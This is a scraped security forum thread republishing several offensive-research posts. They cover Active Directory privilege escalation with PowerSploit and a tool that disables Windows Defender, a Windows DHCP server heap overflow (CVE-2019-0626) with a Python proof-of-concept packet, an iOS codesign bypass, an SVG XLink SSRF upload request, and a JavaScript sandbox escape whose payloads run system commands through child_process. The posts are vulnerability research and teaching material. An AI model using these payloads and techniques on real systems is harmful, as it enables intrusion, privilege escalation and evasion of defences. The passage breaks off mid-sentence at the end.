before using via Invoke-Obfuscation. PowerView is easy to use. Download the PowerSploit suite, and open Powershell in the directory you’ve extracted it in (make sure you’re admin). First, allow scripts to be ran. Set-ExecutionPolicy Bypass Then import the module Import-Module .\PowerView.ps1 In the PowerView module is a command called Invoke-FileFinder, which allows you to search for files or in files for any string you want. Consider the string ‘password’. Search the C drive for anything containing the string ‘password’ Found a secret password file! Just be mindful that this takes a very long time. It helps to narrow the search area down and running the command from that directory. Attack 2: Get-ExploitableSystem This is a pretty self-explanatory script. It will query Active Directory for the hostname, OS version, and service pack level for each computer account, then cross-referenced against a list of common Metasploit exploits. First import the whole PowerSploit suite (Or just PowerView if you want) Import-Module .\PowerSploit.psd1 Then run the command Get-ExploitableSystem -Verbose Hurray for Windows XP! Attack 3: PowerUp In the PowerUp module is a function called “Invoke-All-Checks” which does exactly what it says it does. It checks for everything, from unquoted service paths (which I wrote on how to exploit here) to looking for MS14-025, it does a lot. Look at the Github for more info. Using it is simple Invoke-AllChecks Thanks MSI. Attack 4: GetSystem This module does the same thing the Metasploit ‘GetSystem’ function does. To find out more about what exactly that entails, read this excellent post by CobaltStrike. Otherwise, just run the command. Get-System -Technique Token or Get-System -ServiceName 'PrivescSvc' -PipeName 'secret' I am just a lonely Admin. I am SYSTEM! Tool(s): ADAPE Personally, I wrote one called ADAPE – The Active Directory Assessment and Privilege Escalation script ADAPE is written in Powershell and uses several different other tool’s functions and runs them automatically, preventing the need to port over multiple tools. It’s also obfuscated and turns off Windows Defender to help bypass EDR. ADAPE is meant to be easy to use. Download it, port it over to your target Windows Machine, and run it PowerShell.exe -ExecutionPolicy Bypass ./ADAPE.ps1 Since all the necessary scripts are included, it doesn’t need to reach out to the internet and will store the results in a capture.zip file that can be exported. Error messages are normal, unless it breaks. Then report. Looking for GPP passwords, Kerberoasting, and running Bloodhound ingestor Checking for privesc, then deleting the files it made and zipping up the capture file. If you open up the capture file, you’ll have all the results. Again, by all means, this is not comprehensive. This is just a few tools and attacks I’ve used successfully over the years, so there’s a good chance at least one of these works. In part III, I will go over post-exploitation and persistence. Resources and References: I take no credit for the discovery of any of these techniques, I’m just the dude that makes an article about the ones I like to use. Massive thank you to @harmj0y, @cptjesus, @_wald0, and the rest of the team at SpecterOps for the amazing research they do as well as creation of several excellent tools. Thank you to the Bloodhound Slack for answering my question. Thank you @byt3bl33d3r and the team at Black Hills InfoSec for the research and tools they make. Thank you @_dirkjan and the team at Fox-it for the research and tools. Thank you secureauth for impacket, a staple in every pentesters tool kit. Sursa: https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/
      • 3
      • Upvote
      • Like
  11. CVE-2018-8639-exp platform: windows 2008 and windows 2008 R2 Sursa: https://github.com/ze0r/CVE-2018-8639-exp/
      • 2
      • Upvote
      • Thanks
  12. Analyzing a Windows DHCP Server Bug (CVE-2019-0626) By : MalwareTech March 1, 2019 Category : Vulnerability Research Tags: patch analysis, reverse engineering Vulnerability Research Today I’ll be doing an in-depth write up on CVE-2019-0626, and how to find it. Due to the fact this bug only exists on Windows Server, I’ll be using a Server 2016 VM (corresponding patch is KB4487026). Binary Comparison I ran a BinDiff comparison between the pre and post patch versions of dhcpssvc.dll. Below, we can see that only 4 functions have changed (similarity <1.0). BinDiff comparison of dhcpssvc.dll before and after installing the patch. The first function I decided to look at was “UncodeOption”. My reasoning is it sounds like it’s some kind of decoder, which is a common location for bugs. Double clicking the target function brings up two side by side flow graphs. The original function is on the left, and updated one on the right. Each graph will split functions up into logical blocks of assembly code, similar to IDA’s “graph view”. Green blocks are identical across both functions. Yellow blocks have some instruction variant between function. Grey blocks contain newly added code. Red blocks contain removed code. A side by side comparison of function control flow According to BinDiff, a fair few blocks have been modified. Most interestingly there are two loops, which both now have a new block of code. additional blocks can be if statements containing extra sanity checks; this looks like a good place to start. Whilst it’s possible to do more analysis in BinDiff, I find the interface to be too clunky. I think I already have all the information I need, so it’s time to dive into IDA. Code Analysis If you have the full version of IDA, you can use the decompiler to save you digging through assembly code. Most bugs will be visible at high level, though in very rare cases you may need to compare code at assembly level. Due to the way IDA’s decompiler works, you may find there are duplicate variables. For example, “v8” is a copy of “a2”, but neither value is ever modified. We can clean up the code by right clicking “v8”, and selecting map to another variable By mapping “v8” to “a2”, all instances of “v8” will be replaced by “a2”. Remapping all unnecessary duplicate variables will make things easier to read. Here is a side by side comparison of the code after cleanup. A side-by-side comparison of patched and unpatched functions. The type of the second loop (yellow box) in now “do while” instead of “for”, which now matches the first loop (the loop format change could explains a lot of the yellow blocks in BinDiff). Most importantly, a completely new sanity check has been added (red box). The code in blue box has also been simplified, with some of it moved inside the loop. My next step was to figure out what the “UncodeOption” function is actually doing. Right-clicking a function and selecting “jump to xref…” returns a list of every reference. A list of references to UncodeOption Hmm…All of the calls to “UncodeOption” come from “ParseVendorSpecific” or “ParseVendorSpecific Content”. This lead me to google “DHCP Vendor Specific”. Google’s automatic completion filled in some blanks here. I now know that DHCP has something called “vendor specific options”. A function named “UncodeOption” being called by “ParseVendorSpecific”? Kinda implies decoding of a vendor specific option. So, what’s a vendor specific option? Vendor Specific Options The first result for googling “DHCP Vendor Specific Options” is a blog post which tells me everything I needed to know [1]. Very helpfully, the blog post explain the packet format of the vendor specific options. The format is simple: a 1 byte option code, followed by a 1 byte length specifier, followed by the option value. Now we just need to send a test packet. I found a useful DHCP test client on a random blog [2]. Here is an example command. dhcptest.exe –query –option “Vendor Specific Information”[str]=”hello world” This sets the vendor specific option to “hello world”. Now, we can see if “UncodeOption” gets called. Runtime Analysis In an attempt to cut corners I set a breakpoint on “UncodeOption”. I sent my DHCP request, and hoped for the best. IDA Pro Memory View Awesome! The breakpoint was hit. Looks like the parameters are easy to understand too. RCX (argument 1) points to the start of the vendor specific option. RDX (argument 2) points to the end of the vendor specific option. R8 is 0x2B (the option code for vendor specific options). Now I’m going to revisit the decompiled code and add some descriptive names; I also guessed some variable types. Knowing the format of the vendor specific options helps a lot. The un-patched code after some renaming The addition of some descriptive names and my new found knowledge of vendor specific options made understanding the code much easier. I’ll break it down. There are two loops (starting on line 25 and line 44). First Loop Gets the option code (1st byte of the option buffer). Verify the option code matches the value sent in R8 (0x2B). Get’s the option size (2nd byte of the option buffer), then adds it to a variable I’ve named required_size. increments buffer_ptr_1 to point to the end of the option buffer. Breaks if the new buffer_ptr_1 is larger than the end of the buffer (buffer_end). Ends the loop if “buffer_ptr_1 + option size + 2” is greater than buffer_end. Essentially, the loop will get the length of the option value (in our case “hello world”). If multiple vendor specific options have been sent back to back, the loop will calculate the total size of all values combined. The variable “required_size” is used to allocate heap space later on. Second Loop Gets the option code (1st byte of the option buffer). Verify the option code matches the value sent in R8 (0x2B). Get’s the option size (2nd byte of the option buffer). Append the option value to heap space (i.e. “hello world”) by copying <option_size> number of bytes. increments buffer_ptr_2 to point to the end of the option buffer. Ends the loop if the new buffer_ptr_2 is greater than buffer_end. Code Purpose The function implements a typical array parser. The first loop reads ahead to calculate the buffer size required to parse the array. The second loop then parses the array into a newly allocated buffer. The Bug After staring at the two loop implementations side-by-side, I noticed something. A Side-by-side comparison (Loop 1 is on the left, Loop 2 is on the right) Both loops have a condition which will cause them to exit if the buffer pointer reaches the end of the array (green box). Interestingly, loop 1 has an extra check (red box). Loop 1 also aborts if the next element in the array is invalid (i.e. its’ size will cause the pointer to increment past the end of the array). The difference in logic means loop 1 will check the validity of the next element in the array before processing it, whilst loop 2 will copy the element, then exit due to buffer_ptr_2 being larger than buffer_end. Due to the fact loop 1 is responsible for calculating size, the allocated buffer will only allocate size for the valid array elements. Loop 2 will copy all the valid array elements, as well as a single invalid one, before exiting. So, what if we sent the following? Malicious Option Array The size calculation loop would parse the first option size (0x0B) successfully. Then, the next option size is validated. Due to the fact there are not 0xFF bytes following the option size, it would be seen as invalid and disregarded. The result would be an allocation size of 0x0B (11 bytes). The copy loop would copy the first option value “hello world”. On the second iteration, the option size isn’t validated. The copy will result in 255 bytes (0xFF) being appended to the buffer. A total of 266 will be copied to the 11 byte of heap space, overflowing it by 255 bytes. For the last element to be seen as invalid, there must be less than 255 bytes between the 2nd option length and the end of the buffer (achieved by putting the malicious array at the end of the DHCP packet). Something interesting to note is: we can put any number of bytes after the last option length, as long as it’s less than 255. We can overflow the heap with up to 254 bytes of data we specify, or up to 254 bytes of whatever is after our packet in the heap. Essentially, it’s possible to do both out-of-bounds (OOB) read and write). Proof of Concept To verify the bug, I needed to craft a malicious DHCP packet. I begun by sending a legitimate DHCP packet using dhcp-test, which I captured with WireShark. A DHCP packet displayed by WireShark Looks like the vendor specific options buffer is already at the end of the packet, nice! I simply extracted the hex to a python script and made a simple PoC. Tip: you can right click on the “Bootstrap Protocol” column, then select “Copy”, followed by “..As Escaped String”. from socket import * import struct import os dhcp_request = ( "\x01\x01\x06\x00\xd5\xa6\xa8\x0c\x00\x00\x80\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x63\x82\x53\x63" \ "\x35\x01\x01\x2b\x0b\x68\x65\x6c\x6c\x6f\x20\x77\x6f\x72\x6c\x64\xff" ) dhcp_request = dhcp_request[:-1] #remove end byte (0xFF) dhcp_request += struct.pack('=B', 0x2B) #vendor specific option code dhcp_request += struct.pack('=B', 0xFF) #vendor specific option size dhcp_request += "A"*254 #254 bytes of As dhcp_request += struct.pack('=B', 0xFF) #packet end byte s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP) #DHCP is UDP s.bind(('0.0.0.0', 0)) s.setsockopt(SOL_SOCKET, SO_BROADCAST, 1) #put socket in broadcast mode s.sendto(dhcp_request, ('255.255.255.255', 67)) #broadcast DHCP packet on port 67 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 from socket import * import struct import os dhcp_request = ( "\x01\x01\x06\x00\xd5\xa6\xa8\x0c\x00\x00\x80\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x63\x82\x53\x63" \ "\x35\x01\x01\x2b\x0b\x68\x65\x6c\x6c\x6f\x20\x77\x6f\x72\x6c\x64\xff" ) dhcp_request = dhcp_request[:-1] #remove end byte (0xFF) dhcp_request += struct.pack('=B', 0x2B) #vendor specific option code dhcp_request += struct.pack('=B', 0xFF) #vendor specific option size dhcp_request += "A"*254 #254 bytes of As dhcp_request += struct.pack('=B', 0xFF) #packet end byte s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP) #DHCP is UDP s.bind(('0.0.0.0', 0)) s.setsockopt(SOL_SOCKET, SO_BROADCAST, 1) #put socket in broadcast mode s.sendto(dhcp_request, ('255.255.255.255', 67)) #broadcast DHCP packet on port 67 Next, I attached a debugger to the svchost process containing dhcpssvc.dll and set some breakpoints. One breakpoint is on HeapAlloc, and the other is after the copy loop. Now I send my malicious DHCP packet. HeapAlloc breakpoint hit On the HeapAlloc breakpoint, you can see that the allocation size is 0x0B (enough space for just “hello world”). I wonder what happens when we click run again? post-copy breakpoint hit Whoops! The parser copied “hello world” and 254 bytes of ‘A’s to a heap allocation of only 11 bytes in size. This is most definitely an overflow, but we shouldn’t expect a crash unless we overwrite something critical. Exploitability Considerations Heap overflows can often be leveraged to gain remote code execution (RCE); however, there are some hurdles to overcome first. Over the years Microsoft have gradually introduced new mitigations, reducing heap overflow exploitability. I’ll summaries some of the important mitigations, but you can see a more full write-up on TechNet [3][4]. Windows Vista and Above Most generic heap overflow attacks rely on heap metadata forging to gain arbitrary write or execute capabilities (primitives). Unfortunately, Windows Vista added encoding and verification of heap metadata. Metadata fields are now XORed with a key, massively complicating modification. Without the ability to forge heap metadata, attackers must focus on overwriting the heap data itself. It’s still possible to overwrite objects stored on the heap, such as a class instance; these can provide the same primitives as metadata forgery. Windows 8 and Above Allocations smaller than 16,368 bytes go on something called the Low Fragmentation Heap (LFH). Windows 8 adds LFH allocation randomization, which makes the allocation order far less predictable. Being unable to control where an object is allocated makes overwriting a game of chance; however, there’s still hope. If an object’s allocation is attacker controlled, one could allocate hundreds of copies, increasing the chance of a successful overwrite. Of course, you’d have to find such an object and it’d have to be exploitable. Conclusion I’ve not been able to spend as much time on this bug as I’d like, and am yet to find a RCE method for newer systems. So far I’ve found noticeda couple of TCP interfaces which may allow for better heap control. Assuming something more interesting doesn’t appear, I may come back to this in future. References Microsoft Vendor specific DHCP options explained and demystified https://www.ingmarverheij.com/microsoft-vendor-specific-dhcp-options-explained-and-demystified/ A custom tool for sending DHCP requests https://blog.thecybershadow.net/2013/01/10/dhcp-test-client/ TechNet blog post about early heap mitigations https://blogs.technet.microsoft.com/srd/2009/08/04/preventing-the-exploitation-of-user-mode-heap-corruption-vulnerabilities/ TechNet blog post about Windows 8+ heap mitigations – https://blogs.technet.microsoft.com/srd/2013/10/29/software-defense-mitigating-heap-corruption-vulnerabilities/ Sursa: https://www.malwaretech.com/2019/03/analyzing-a-windows-dhcp-server-bug-cve-2019-0626.html
  13. 01 March 2019 Completely Bypassing Codesigning on Modern iOS By Dynastic iOS prevents the execution of unsigned binaries, and in iOS 12, CoreTrust enforces this even further, becoming a significant obstacle for jailbreaks. In this post, we will detail a practical attack against both AMFI and CoreTrust, utilising a time of check to time of use (TOCTOU) attack. This is a follow-up to our previous research post on CoreTrust, CoreTrust: an overview. Heads up: This is developer-oriented research for those with advanced knowledge of programming, code signing techniques, attack vectors, security research, and jailbreak development. While we have attempted to thoroughly explain terms used, a background in jailbreaking is recommended. Background When a binary is spawned, iOS ensures that it has a valid code signature from Apple before it is executed. This is stored in the vnode of the binary, in a field called cs_blob. Among other things, the cs_blob stores a hash of the binary in a field called csb_cdhash. AppleMobileFileIntegrity (AMFI) is responsible for ensuring the validity of the signature and the entitlements. Overview Early on in the codesigning validation process, a function called _vnode_check_signature is invoked in AMFI—this is where the bulk of AMFI’s logic lies, and is where all of AMFI’s checks for a binary originate from. From here, the signature and entitlements are parsed. Any error that occurs here is fatal and prevents the binary from being launched. CoreTrust validation occurs here too (we recommend reading our previous post CoreTrust: an overview to understand more about what CoreTrust does). AMFI has a feature known as the TrustCache, which is simply a list of cd_hashes that are automatically trusted by AMFI. Xcode utilises this functionality to make Xcode’s debugging features work, and modern jailbreaks use this to load their main payloads and run them with special privileges. Early in the _vnode_check_signature flow, the cd_hash of the vnode is checked against the list of hashes in the loadedTrustCaches. The check in AMFI to see if a hash is in a loaded TrustCache. This happens very early in the flow, before CoreTrust is called and before any other additional checks happen. Therefore, if the hash can be changed to a trusted hash whilst AMFI is evaluating it, but returned to normal after, then the codesigning flow can be completely bypassed. The attack Now that we know about about the issue, we can work on attacking it. It is important to remember that the cd_hash of the binary must match the hash of the binary when dyld checks it, so the cd_hash of the binary must be swapped back before that happens. To achieve this, these steps have to be performed on the launch of any process: Lookup the vnode of the binary, attaching a cs_blob to it. This can be achieved using the F_ADDSIGS fnctl call, which will automatically add a cs_blob to a given vnode. Get the cs_blob of any binary that contains a valid CMS blob or is in the TrustCache, and replace the cs_blob of the vnode with it. Once AMFI has finished, the cs_blob of the vnode has to be restored to one which matches the binary. This once again can be done by calling the F_ADDSIGS fnctl. The binary has now been launched successfully! 🎉 Whilst we mentioned the TrustCache approach, provided that the cs_blob that is swapped has a valid CMS blob (to pass CoreTrust validation), this approach will still work. It is also possible to replace only the cd_hash, with that of one in the TrustCache, providing this is changed back in step 3. Note: There are many variations possible to this attack. For example, to avoid TOCTOU’ing completely, the binary could be added to the TrustCache and then removed after the AMFI flow has completed. The differences between these attacks are minimal and it should be trivial to switch implementations; the most important fact is that your solution is stable, and reliable. Obtaining the necessary hooks (process launch and pre-dyld) is an exercise left to the reader. Some modern jailbreaks already have the required userland hooks, so this technique is perfect for such tools. Pratical usage We envision that this bypass can be used in a jailbreak as a proper bypass to the CoreTrust mitigation. Additionally, it serves as a cleaner codesign bypass. Most modern jailbreaks achieve this by hijacking a daemon, which would no longer be necessary with this technique. Overall, this could increase stability and user experience when using such tools. We plan on releasing a POC attack utilising this bug soon. This post will be updated with a link to that when it is ready. Thanks Many thanks to @iBSparkes, for helping out with the implementation of the attack, and for technical proofreading. His Twitter is full of interesting content similar to this. We hope that this research is useful to you. If it is, and you use it in a project, please include a reference to this post; hopefully someone else can also benefit from it. For that reason, please consider open-sourcing any code which implements this technique. We also ask that you credit Dynastic and @iBSparkes, as hard work has gone into this writeup and research. This article was brought to you by Dynastic. Sursa: https://research.dynastic.co/2019/03/01/codesign-bypass?refsrc=dynl
  14. SVG XLink SSRF fingerprinting libraries version Arbaz Hussain Mar 2 SSRF(Server-side-request-forgery) have been quite a popular attack surface for the uploading functionality where application fetches the assets from external resources in form of images,documents etc SVG is an XML based vector image used to display a variety of graphics on the Web and other environments, due it ’s XML structure it supports various XML features, one of the feature is XLink which is responsible for creating internal and external links within XML document. During the testing process, I encountered with XLINK based SSRF to enumerate various internal libraries, installed tools, gnome version’s, much more etc, POST /upload HTTP/1.1 Host: redacted.com Connection: close Content-Length: 1313 Accept: application/json, text/javascript, */*; q=0.01 Origin: https://redacted.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryINZ5MzqXAud4aYrN Referer: https://redacted.com Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 ceaa2f2d25275bb5879a726eb8c04aec7b3a64f7 ------WebKitFormBoundaryINZ5MzqXAud4aYrN Content-Disposition: form-data; name="timestamp" 1551244304 ------WebKitFormBoundaryINZ5MzqXAud4aYrN Content-Disposition: form-data; name="api_key" 413781391468673 ------WebKitFormBoundaryINZ5MzqXAud4aYrN Content-Disposition: form-data; name="file"; filename="test.jpg" Content-Type: image/jpeg <?xml version="1.0" encoding="UTF-8" standalone="no"?><svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"><image height="30" width="30" xlink:href="http://myserver:1337/" /></svg> Incoming Request at my server: Interestingly referer header shows the request has been generated from an internal network of the application which is hosting app over port 3000 Since the application is accepting SVG based images, the second try would be to include the static entities to see if the parser is allowing custom entities. <?xml version="1.0" encoding="UTF-8" standalone="no"?> <!DOCTYPE testingxxe [ <!ENTITY xml "POC for Static Entities Allowed">]> <svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"> <text x="0" y="20" font-size="20">&xml;</text> </svg> As parser is allowing static entities, Next step would be to include SYSTEM based entities along with DTD to fetch the malicious DTD which is more like XXE attack but parser was blocking system based entities in the backend, they had strong validation of the malicious malformed XML. Since parser is blocking SYSTEM based entities our attack surface has been limited, Now it’s time to test Billion Laughs attack since application allowed static entities. Always note that: Before blinding fuzzing the various XML payloads, make sure to understand the parser logic, Before trying the billion laugh attack, I threw the server with simple callback entity function to see if the parser allows rendering of xml1 entity through callback of xml2 entity. <?xml version="1.0" encoding="UTF-8" standalone="no"?> <!DOCTYPE testingxxe [ <!ENTITY xml1 "This is my first message"> <!ENTITY xml2 "&xml1";> ]> <text x="0" y="20" font-size="20">&xml2;</text> </svg> Unfortunately, the parser is blocking the callback entities as well. Now our attack surface is at ground level (Picture present fingerprint trick) by including the internal path along with picture present in system & we get interaction if that picture present internally on the system as described by @flyod at https://hackerone.com/reports/223203 In order to enumerate all possible things, we need to build a wordlist for all possible local pictures present on the system. Now it’s time to make different port’s open or just with different paths& fuzz it along with all the internal picture path’s collected to fingerprint all possible libraries, script, tools installed along with versions. Arbaz Hussain ~Kiraak-Boy~ Sursa: https://medium.com/@arbazhussain/svg-xlink-ssrf-fingerprinting-libraries-version-450ebecc2f3c
  15. Bypassing a restrictive JS sandbox Matías Lang 2019-03-01 12:01 1 Comment Source Also available in: Español While participating in a bug bounty program, I found a site with a very interesting functionality: it allowed me to filter some data based on a user-controlled expression. I could put something like book.price > 100 to make it only show the books that are more expensive than $100. Using true as filter showed me all the books, and false didn't show anything. So I was able to know whether the expression I used was evaluating to true or false. That functionality caught my attention so I tried passing it more complex expressions, like (1+1).toString()==="2" (evaluated to true) and (1+1).toString()===5 (evaluated to false). This is clearly JavaScript code, so I guessed that the expression was being used as an argument to a function similar to eval, inside a NodeJS server. It seemed like I was close to find a Remote Code Execution vulnerability. However, when I used more complex expressions, I was getting an error saying that they were invalid. I guessed that it wasn't the eval function that parsed the expression, but a kind of sandbox system for JavaScript. Sandbox systems used to execute untrusted code inside a restricted environment are usually hard to get right. In most cases there exist ways to bypass this protections to be able to execute code with normal privileges. This is specially true if they try to limit the usage of complex, feature bloated languages like JavaScript. The problem had already caught my attention, so I decided to spend my time trying to break this sandbox system. I would learn about JavaScript internals, and gain some bucks in case of finding and exploiting the RCE. The first thing I did was identify what library the site was using to implement the sandbox, given that the NodeJS ecosystem is known for having tens of libraries that do the same thing, and in many cases all of them are doing it wrong. Maybe it was a custom sandbox library used only for the target site, but I discarded this possibility because it was really unlikely that the developers spent their time doing this kind of things. Finally, by analyzing the app error messages I concluded that they were using static-eval, a not very known library (but written by substack, somebody well known in the NodeJS community). Even if the original purpose of the library wasn't to be used as a sandbox (I still don't understand what it was created for), its documentation suggests that. In the case of the site I was testing, it certainly was being used as a sandbox. Breaking static-eval The idea of static-eval is to use the esprima library to parse the JS expression and convert it to an AST (Abstract Syntax Tree). Given this AST and an object with the variables I want to be available inside the sandbox, it tries to evaluate the expression. If it finds something strange, the function fails and my code isn't executed. At first I was a bit demotivated because of this, since I realized that the sandbox system was very restrictive with what it accepted. I wasn't even able to use a for or while statement inside my expression, so doing something that required an iterative algorithm was almost impossible. Anyway, I kept trying to find a bug in it. I did not find any bug at first sight, so I looked at the commits and pull requests of the static-eval GitHub project. I found that the pull request #18 fixed two bugs that allowed a sandbox escape in the library, exactly what I was looking for. I also found a blog post of the pull request author that explained this vulnerabilities in depth. I immediately tried using this techniques in the site I was testing, but unfortunately to me, they were using a newer static-eval version that already patched this vulns. However, knowing that somebody has already been able to break this library made me more confident so I kept looking for new ways to bypass it. Then, I analyzed this two vulns in depth, hoping this could inspire me to find new vulnerabilities in the library. Analysis of the first vulnerability The first vuln used the function constructor to make a malicious function. This technique is frequently used to bypass sandboxes. For example, most of the ways to bypass the angular.js sandbox to get an XSS use payloads that end up accessing and calling the function constructor. It was also used to bypass libraries similar to static-eval, like vm2. The following expression shows the existence of the vulnerability by printing the system environment variables (this shouldn't be possible because the sandbox should block it): "".sub.constructor("console.log(process.env)")() In this code, "".sub is a short way to obtain a function ((function(){}) would also work). Then it access to the constructor of that function. That is a function that when called returns a new function whose code is the string passed as argument. This is like the eval function, but instead of executing the code immediately, it returns a function that will execute the code when called. That explains the () at the end of the payload, that calls the created function. You can do more interesting things than showing the environment variables. For example, you can use the execSync function of the child_process NodeJS module to execute operating system commands and return its output. This payload will return the output of running the id command: "".sub.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")() The payload is similar to the previous one, except for the created function's body. In this case, global.process.mainModule.constructor._load does the same as the require function of NodeJS. For some reason I ignore, this function isn't available with the name require inside the function constructor, so I had to use that ugly name. The fix for this vulnerability consisted in blocking the access to properties of objects that are a function (this is done with typeof obj == 'function'😞 else if (node.type === 'MemberExpression') { var obj = walk(node.object); // do not allow access to methods on Function if((obj === FAIL) || (typeof obj == 'function')){ return FAIL; } This was a very simple fix, bit it worked surprisingly well. The function constructor is available, naturally, only in functions. So I can't get access to it. An object's typeof can't be modified, so anything that is a function will have its typeof set to a function. I didn't find a way to bypass this protection, so I looked at the second vuln. Analysis of the second vuln This vuln was way more simple and easy to detect than the first one: the problem was that the sandbox allowed the creation of anonymous functions, but it didn't check their body to forbid malicious code. Instead, the body of the function was being directly passed to the function constructor. The following code has the same effect than the first payload of the blog post: (function(){console.log(process.env)})() You can also change the body of the anonymous function so it uses execSync to show the output of executing a system command. I'll leave this as an exercise for the reader. One possible fix for this vulnerability would be to forbid all anonymous function declarations inside static-eval expressions. However, this would block the legitimate use cases of anonymous functions (for example, use it to map over an array). Because of this, the fix would have to allow the usage of benign anonymous functions, but to block the usage of malicious ones. This is done by analyzing the body of the function when it is defined, to check it won't perform any malicious actions, like accessing the function constructor. This fix turned out to be more complex than the first one. Also, Matt Austin (the author of the fix) said he wasn't sure it would work perfectly. So I decided to find a bypass to this fix. Finding a new vulnerability One thing that caught my attention was that static-eval decided whether the function was malicious or not at definition time, and not when it was being called. So it didn't consider the value of the function arguments, because that would require to make the check when the function is called instead. My idea was always trying to access the function constructor, in a way that bypasses the first fix that forbids that (because I'm not able to access properties of functions). However, what would happen if I try to access the constructor of a function parameter? Since its value isn't known at definition time, maybe this could confuse the system and make it allow that. To test my theory, I used this expression: (function(something){return something.constructor})("".sub) If that returned the function constructor, I would have a working bypass. Sadly for me, it wasn't the case. static-eval will block the function if it accesses a property of something with an unknown type at function definition time (in this case, the something argument). One useful feature of static-eval that is used in almost all cases, is allowing to specify some variables you want to be available inside the static-eval expression. For example, in the beginning of the blog post I used the expression book.price > 100. In this case, the code calling static eval will pass it the value of the book variable so it can be used inside the expression. This gave me another idea: what would happen if I make an anonymous function with an argument whose name is the same as an already defined variable? Since it can't know the value of the argument at definition time, maybe it uses the initial value of the variable. That would be very useful to me. Suppose I have a variable book and its initial value is an object. Then, the following expression: (function(book){return book.constructor})("".sub) would have a very satisfactory result: when the function is defined, static-eval would check if book.constructor is a valid expression. Since book is initially an object (whose typeof is object) and not a function, accessing to its constructor is allowed and the function will be created. However, when I call this function, book will take the value passed as argument to the function (this is "".sub, another function). Then it will access and return its constructor, effectively returning the function constructor. Sadly, this didn't work either because the author of the fix considered this case. At the moment of analyzing the function's body, the value of all its arguments it set to null, overriding the initial value of the variables. This is a fragment of the code doing that: node.params.forEach(function(key) { if(key.type == 'Identifier'){ vars[key.name] = null; } }); This code takes the AST node that defines the function, iterates over each of its parameters whose type is Identifier, takes its name and sets to null the attribute of vars with that name. Even if the code looks correct, it has a very common bug: it doesn't cover all possible cases. What would happen if an argument is something strange and its type isn't Identifier? instead of doing something sane and saying "I don't know what this is, so I'll block the entire function" (like in a whitelist), it will ignore that argument and continue with the rest (like a blacklist). This means that if I make a node representing a function argument have a type different from Identifier, the value of the variable with that name won't be overwritten, so it would use the initial value. At this time I was pretty confident that I found something important. I only needed to find how to set the key.type to something different from Identifier. As I commented before, static-eval uses the esprima library to parse the code we give to it. According to its documentation, esprima is a parser that fully supports the ECMAScript standard. ECMAScript is something like a dialect of JavaScript with more features, that makes its syntax more comfortable to the user1. One feature that was added to ECMAScript is function parameter destructuring. With this feature, the following JS code is now valid: function fullName({firstName, lastName}){ return firstName + " " + lastName; } console.log(fullName({firstName: "John", lastName: "McCarthy"})) The curly braces inside the definition of the function arguments indicate that the function doesn't take two arguments firstName and lastName. Instead, it takes just one argument that is an object that must have the firstName and lastName properties. The previous code is equivalent to the following: function 